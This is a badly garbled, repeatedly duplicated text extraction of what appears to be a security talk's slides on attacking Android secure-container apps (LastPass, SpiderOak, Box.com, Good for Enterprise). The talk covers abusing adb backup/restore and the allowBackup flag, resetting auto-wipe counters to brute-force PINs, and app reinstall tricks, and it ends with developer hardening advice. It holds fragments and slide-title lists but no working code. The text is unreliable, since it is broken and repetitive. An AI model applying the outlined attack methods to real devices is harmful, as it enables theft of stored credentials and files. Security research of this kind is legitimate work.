thoughOK


You can enable a

PIN





PIN ==

SECURE


AndroidManifestxml



AndroidManifestxml


Default true









Android Backup (ab)


LPandroidxml





0ltstringgt




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253







buthellip


The devıce

ıs ınsecure


worse still


BYOD



Solution



to the data



buthellip








state of

securityDevice

Source threatpost






KEEPCALM


secure contaıners

wıll save us


hellip or not


Sc narıo

1

e


Scenario




buthellip


remember


secure containers

will SAVE us



G ALS

11

][


TLDR


pwn secure

contaıners


G ALMYNOT



34


r00t the device






HOW O

2

][


keep it simple










adbcrash course





























adb shell



Supporting Tools




3

][Closerlook



lastpass


lastpass




lastpass



Why store

the PW





Itrsquos

thoughOK


You can enable a

PIN





PIN ==

SECURE


AndroidManifestxml



AndroidManifestxml


Default true









Android Backup (ab)


LPandroidxml





0ltstringgt




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


The devıce

ıs ınsecure


worse still


BYOD



Solution



to the data



buthellip








state of

securityDevice

Source threatpost






KEEPCALM


secure contaıners

wıll save us


hellip or not


Sc narıo

1

e


Scenario




buthellip


remember


secure containers

will SAVE us



G ALS

11

][


TLDR


pwn secure

contaıners


G ALMYNOT



34


r00t the device






HOW O

2

][


keep it simple










adbcrash course





























adb shell



Supporting Tools




3

][Closerlook



lastpass


lastpass




lastpass



Why store

the PW





Itrsquos

thoughOK


You can enable a

PIN





PIN ==

SECURE


AndroidManifestxml



AndroidManifestxml


Default true









Android Backup (ab)


LPandroidxml





0ltstringgt




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


worse still


BYOD



Solution



to the data



buthellip








state of

securityDevice

Source threatpost






KEEPCALM


secure contaıners

wıll save us


hellip or not


Sc narıo

1

e


Scenario




buthellip


remember


secure containers

will SAVE us



G ALS

11

][


TLDR


pwn secure

contaıners


G ALMYNOT



34


r00t the device






HOW O

2

][


keep it simple










adbcrash course





























adb shell



Supporting Tools




3

][Closerlook



lastpass


lastpass




lastpass



Why store

the PW





Itrsquos

thoughOK


You can enable a

PIN





PIN ==

SECURE


AndroidManifestxml



AndroidManifestxml


Default true









Android Backup (ab)


LPandroidxml





0ltstringgt




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


BYOD



Solution



to the data



buthellip








state of

securityDevice

Source threatpost






KEEPCALM


secure contaıners

wıll save us


hellip or not


Sc narıo

1

e


Scenario




buthellip


remember


secure containers

will SAVE us



G ALS

11

][


TLDR


pwn secure

contaıners


G ALMYNOT



34


r00t the device






HOW O

2

][


keep it simple










adbcrash course





























adb shell



Supporting Tools




3

][Closerlook



lastpass


lastpass




lastpass



Why store

the PW





Itrsquos

thoughOK


You can enable a

PIN





PIN ==

SECURE


AndroidManifestxml



AndroidManifestxml


Default true









Android Backup (ab)


LPandroidxml





0ltstringgt




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


Solution



to the data



buthellip








state of

securityDevice

Source threatpost






KEEPCALM


secure contaıners

wıll save us


hellip or not


Sc narıo

1

e


Scenario




buthellip


remember


secure containers

will SAVE us



G ALS

11

][


TLDR


pwn secure

contaıners


G ALMYNOT



34


r00t the device






HOW O

2

][


keep it simple










adbcrash course





























adb shell



Supporting Tools




3

][Closerlook



lastpass


lastpass




lastpass



Why store

the PW





Itrsquos

thoughOK


You can enable a

PIN





PIN ==

SECURE


AndroidManifestxml



AndroidManifestxml


Default true









Android Backup (ab)


LPandroidxml





0ltstringgt




( )THEORY




drop_the_DBass()end


Theory




Proposed Attack

















counter++



We get

tries10000



We get

tries10000








PROFIT


Easier Attack


bull remove PIN


easierhellip



>


for points





Persistence






PROFIT++



spideroak



spideroak


I said not bad


httpsspideroakcom


Thats good


but users are dumb


and spideroak



8




spideroak






boxcom


Boxcom





REPHRASE

POLICYYOUR

AGRESSIVE MUCH




alreadyhellip


Boxcom




xxxxxltstringgt

hashed pin

myPreferencexml




b cunning or wily


Boxcom


bull Profit


>



GOODfor enterprise


GOOD




httpswwwgoodcom






httpswwwgoodcom




PROBLEM

1


unlike LastPass


preferences are

encrypted


PROBLEM

2




Disable PIN


auto-wipe counter


brute-force


buthellip



AndroidManifestxml

DE

RP


THEORY

1


Theory



THEORY

2


adb restore


over writeauto-wipe

counter


facepalm


brute-force


Naiumlve Attack




PROBLEM

3





















Device

CONTAINER


Device

CONTAINER


Device

CONTAINER

facepalm

facepalm


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

